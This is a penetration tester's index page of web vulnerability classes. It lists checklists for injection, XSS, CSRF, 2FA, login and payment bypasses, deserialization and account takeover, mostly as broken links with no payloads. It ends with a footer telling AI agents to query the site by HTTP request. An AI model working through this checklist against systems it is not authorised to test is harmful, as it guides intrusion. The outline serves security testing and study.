# Web Vulnerabilities ## Proxies * [ ] [**Server Side Inclusion**](/notes/network-services/ports/80-443-http-s/web-vulnerabilities/ssi.md) * [ ] [**Cloudflare Bypass**](/notes/network-services/ports/80-443-http-s/web-vulnerabilities/cloudflare-bypass.md) * [ ] [**XSLT Server Side Injection**](/notes/network-services/ports/80-443-http-s/web-vulnerabilities/xlst.md) ## **User input** ### **Reflected Values** If the introduced data may somehow be reflected in the response, the page might be vulnerable to several issues. * [ ] [**Client Side Template Injection**](/notes/network-services/ports/80-443-http-s/web-vulnerabilities/csti.md) * [ ] [**Command Injection**](/notes/network-services/ports/80-443-http-s/web-vulnerabilities/command-injection.md) * [ ] [**File Inclusion/Path Traversal**](/notes/network-services/ports/80-443-http-s/web-vulnerabilities/file-inclusion-path-traversal.md) **TODO:** * [ ] [**Prototype Pollution to XSS**](broken://pages/o4BNyaSE0gwoHQ1z0j7z#client-side-prototype-pollution-to-xss) * [ ] [**Server Side Inclusion/Edge Side Inclusion**](broken://pages/HPeX9XjuZC6HN2lZV9oH) * [ ] [**Server Side Request Forgery**](broken://pages/lICZwfhTsRhF4nGDu8bG) * [ ] [**Server Side Template Injection**](broken://pages/omuS5Y6Yba2O7Q2u2bNx) * [ ] [**Reverse Tab Nabbing**](broken://pages/pstP6N5ikchspvqParNS) * [ ] [**XSLT Server Side Injection**](broken://pages/RcnCdas4zyFSUF59Voen) * [ ] [**XSS**](broken://pages/0Ag45nFpSS3g4hTEsFb1) * [ ] [**XSSI**](broken://pages/Hk2cHPAhK1lY6o5a87a5) * [ ] **XS-Search** Some of the mentioned vulnerabilities require special conditions, others just require the content to be reflected. You can find some interesting polygloths to test quickly the vulnerabilities in: ### **Search functionalities** If the functionality may be used to search some kind of data inside the backend, maybe you can (ab)use it to search arbitrary data. * [ ] [**File Inclusion/Path Traversal**](broken://pages/EsI9qe4WdfrC3Tkumqqk) * [ ] [**NoSQL Injection**](broken://pages/ImqJx0euGifMIWVnDvGd) * [ ] [**LDAP Injection**](broken://pages/okycio30oL9qOAkaCc9h) * [ ] [**ReDoS**](broken://pages/jhXgAHMVg09RocMeFYFt) * [ ] [**SQL Injection**](broken://pages/9NV1Y1ur3n93ekPMY7sn) * [ ] [**XPATH Injection**](broken://pages/yGkodNJX5L5WRSZhPIlP) ### **Forms, WebSockets and PostMsgs** When a websocket posts a message or a form allowing users to perform actions vulnerabilities may arise. * [ ] [**Cross Site Request Forgery**](broken://pages/0QtJI7erISFZa0SHyrDL) * [ ] [**Cross-site WebSocket hijacking (CSWSH)**](broken://pages/kIOEFFyRlazQlS7gCf8A) * [ ] [**PostMessage Vulnerabilities**](broken://pages/FREXVF3hJx580lncvIYK) ### **HTTP Headers** Depending on the HTTP headers given by the web server some vulnerabilities might be present. * [ ] [**Clickjacking**](broken://pages/K7ekgjjUzTSSJtiA14QE) * [ ] [**Content Security Policy bypass**](broken://pages/BA0iZJf87AKejOnRtI3B) * [ ] [**Cookies Hacking**](broken://pages/v0A3nNXNaN7G8hj7B0DL) * [ ] [**CORS - Misconfigurations & Bypass**](broken://pages/lz3sV1sEkQfdA6RgzH0S) ### **Bypasses** There are several specific functionalities where some workarounds might be useful to bypass them * [ ] [**2FA/OTP Bypass**](broken://pages/JGGYtGz3b0HkPkp8bjVk) * [ ] [**Bypass Payment Process**](broken://pages/nFHRyuQC8p8w9S28YzqF) * [ ] [**Captcha Bypass**](broken://pages/ozZi4eRTM359pO4uGzE5) * [ ] [**Login Bypass**](broken://pages/taZDHiWzgam2DbuLWmBc) * [ ] [**Race Condition**](broken://pages/jR2aeBAJV9Y9zbDTtMFI) * [ ] [**Rate Limit Bypass**](broken://pages/XlIjPYzFL6yVjj2jPD4z) * [ ] [**Reset Forgotten Password Bypass**](broken://pages/E565s6uHUrZ6zN8XLMAw) * [ ] [**Registration Vulnerabilities**](broken://pages/f3xwYYpVW8i3GBAxEEMl) ### **Structured objects / Specific functionalities** Some functionalities will require the **data to be structured in a very specific format** (like a language serialized object or XML). Therefore, it's easier to identify if the application might be vulnerable as it needs to be processing that kind of data.\ Some **specific functionalities** may be also vulnerable if a **specific format of the input is used** (like Email Header Injections). * [ ] [**Deserialization**](broken://pages/8JFreTu76LKxP4bLhJjM) * [ ] [**Email Header Injection**](broken://pages/U21miJ3UPoJUJCq8AorQ) * [ ] [**JWT Vulnerabilities**](broken://pages/wOdVltrFe2X0dbQfjL8v) * [ ] [**XML External Entity**](broken://pages/buOZY5e7mYvyGPeuVbD5) ### Files Functionalities that allow uploading files might be vulnerable to several issues.\ Functionalities that generate files including user input might execute unexpected code.\ Users that open files uploaded by users or automatically generated including user input might be compromised. * [ ] [**File Upload**](broken://pages/XGlt8CYJ3LTDGb2EdEHn) * [ ] [**Formula Injection**](broken://pages/yUOI6QC70UjnGHXXA7BQ) * [ ] [**PDF Injection**](broken://pages/M7kBvg4UcIXO15gZ2uTU) * [ ] [**Server Side XSS**](broken://pages/gA14tB5uNu1AZSXdrPex) ### **External Identity Management** * [ ] [**OAUTH to Account takeover**](broken://pages/OEny1HLXi5G4yDefaowY) * [ ] [**SAML Attacks**](broken://pages/gJyG40ydT12tSIBplM7B) ### **Other Helpful Vulnerabilities** These vulnerabilities might help to exploit other vulnerabilities. * [ ] [**Domain/Subdomain takeover**](broken://pages/OHn7qzOAxodoIZwAhMW3) * [ ] [**IDOR**](broken://pages/9CIQ4fOFj9oK7fZ9HYfe) * [ ] [**Parameter Pollution**](broken://pages/BrSr5l1XDDVekHwJXVYs) * [ ] [**Unicode Normalization vulnerability**](broken://pages/k41i4cI4KI3W7JZz9VSk) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xpthree.gitbook.io/notes/network-services/ports/80-443-http-s/web-vulnerabilities.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.